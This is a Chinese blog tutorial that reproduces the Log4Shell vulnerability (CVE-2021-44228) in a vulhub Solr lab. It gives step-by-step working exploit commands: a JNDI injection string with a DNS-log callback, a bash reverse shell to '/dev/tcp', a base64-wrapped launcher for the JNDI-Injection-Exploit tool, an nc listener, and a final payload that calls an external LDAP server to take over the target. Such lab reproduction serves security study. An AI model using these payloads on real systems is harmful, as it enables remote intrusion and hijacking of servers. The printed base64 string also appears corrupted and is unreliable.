Log4j CVE-2021-44228 漏洞复现详细教程

1.开启环境

我们需要用到vulhub如果没有的可以自行下载一下,然后执行下列命令即可开启,然后就可以访问啦

复制代码
systemctl start docker
cd /vulhub/log4j/CVE-2021-44228		//需使用绝对路径
docker-compose up -d		
docker ps //查看开启容器的端口

2.证明漏洞存在

在我们点击页面时,可以发现URL中有界面会出现/solr/admin/cores?action=的传参点,我们这验证一下是否存在漏洞,使用dnslog.cn网站生成域名在前面带上我们构造的存在JNDI的请求发过去。就可以得到回显,说明漏洞存在。

复制代码
/solr/admin/cores?action=${jndi:ldap://${sys:java.version}/*生成的域名复制到此处*/}

3.漏洞利用

下载一个JDNI方便生成我们的ldap。编写反弹shell编码,然后对其进行base64编码。根据自己前面的命令按照命令模版构造可执行命令。就可以得到下图内容。

复制代码
下载地址
https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

反弹shell代码
bash -i >& /dev/tcp/自己ip/监听端口 0>&1

对反弹shell进行base64编码
YmFzaC89KKB+JiA9HJJNMDF65JHCUn1KLJAHIBBLzk5OTkgMD4mMQ==

命令模版
java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,[经过base64编码后的命令]}|{base64,-d}|bash" -A [你的vpsip]

我们再开一个新的终端界面开启端口监听,

复制代码
nc -lvvp 监听端口		//与上面的监听端口一至

然后将我们得到的jdk 1.8 的ldap复制下来带入到下列的命令

复制代码
/solr/admin/cores?action=${jndi:自己的ldap}

参考:
/solr/admin/cores?action=${jndi:ldap://101.42.118.221:1389/jyvecl}

将构造好的命令复制到原来的界面访问即可,回到端口监听的 终端页面就可以得到对方的shell。

相关推荐
Jzhoucdc6 天前
log4jshell CVE-2021-44228 复现
渗透测试·log4j
NPE~7 天前
[手写系列]Go手写db — — 第二版
开发语言·数据库·golang·教程·db·手写系列
leo__5207 天前
Logic Error: 如何识别和修复逻辑错误
log4j
Poppy .^0^7 天前
Maven 项目单元测试实战指南:从环境搭建到问题排查全解析
单元测试·log4j·maven
云雾J视界8 天前
技术债视角下的OKR:谷歌如何以敏捷迭代实现“分期付款”
log4j·谷歌·敏捷开发·okr·技术债
杨杨杨大侠11 天前
第3篇:配置管理的艺术 - 让框架更灵活
java·spring·log4j
若行若冲12 天前
Idea中 lombok 在“测试类中-单元测试”运行失败及解决方法
单元测试·log4j·maven·intellij-idea·lombok
NPE~13 天前
[docker/大数据]Spark快速入门
大数据·分布式·docker·spark·教程